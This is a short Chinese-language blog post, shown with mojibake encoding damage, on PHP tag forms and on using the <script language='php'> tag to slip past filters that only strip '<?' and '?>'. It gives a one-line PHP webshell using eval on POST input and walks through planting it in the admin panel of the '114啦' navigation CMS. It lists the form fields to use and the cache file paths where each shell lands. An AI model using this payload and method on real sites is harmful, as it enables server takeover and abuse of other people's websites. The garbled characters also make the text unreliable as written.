首先介紹下php的各種標(biāo)簽：
1)：
<?php ?>
demo:
<?php echo "test";?>
這個(gè)標(biāo)簽現(xiàn)在程序大多都是使用的這種標(biāo)簽！大家都不陌生了，這里就不多介紹了！
2)：
<? echo "test"; ?>
這種標(biāo)簽是在以前很普遍的一種用法php 老版本開發(fā)的cms大多都是用的它，
大多程序員都是很熟悉的！我們把這種標(biāo)簽稱為短語標(biāo)簽！
3）：
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
這個(gè)標(biāo)簽是今天的重點(diǎn)，大多都不熟悉的！而且程序員在網(wǎng)站后臺(tái)過濾插一句話
的時(shí)候往往都是以
“<?,?>”
這兩個(gè)關(guān)鍵字進(jìn)行替換或過濾的！所以這種標(biāo)簽在后臺(tái)插馬
的時(shí)候用處還是很大的！PS：就是應(yīng)為使用量不大，就不重視！這樣能行嗎？
實(shí)戰(zhàn)：114啦導(dǎo)航準(zhǔn)備我們的一句話代碼：利用script的標(biāo)簽代碼:
<script language="php">eval ($_POST[1]);</script>
首先后臺(tái)我跟晴天那家伙已經(jīng)看完了。他自己的方法也沒拿下shell模版目錄權(quán)限是只讀！你們懂的！
這里的方法就是利用緩存拿shell.這個(gè)方法是以前公布出來的。作者具體就不知道是誰了（轉(zhuǎn)載亂了）
–官方以及把這里修補(bǔ)了，但是修補(bǔ)方法很馬虎！就是我之前說的過濾關(guān)鍵字只有
<? ?>
所以這里我們可以利用 我們準(zhǔn)備好的script格式的php一句話代碼插入！
名站首行：
HTML內(nèi)輸入一句話，提交后一句話木馬位于admin/data/cache/cache_mztop.php
名站輪播：
站點(diǎn)網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_famous_loop.php
名站切換：
ifreme網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_famous_tab.php
首頁實(shí)用工具：
工具網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_index_tool.php
本文來源于：半坑土農(nóng)民'S Blog

最新評(píng)論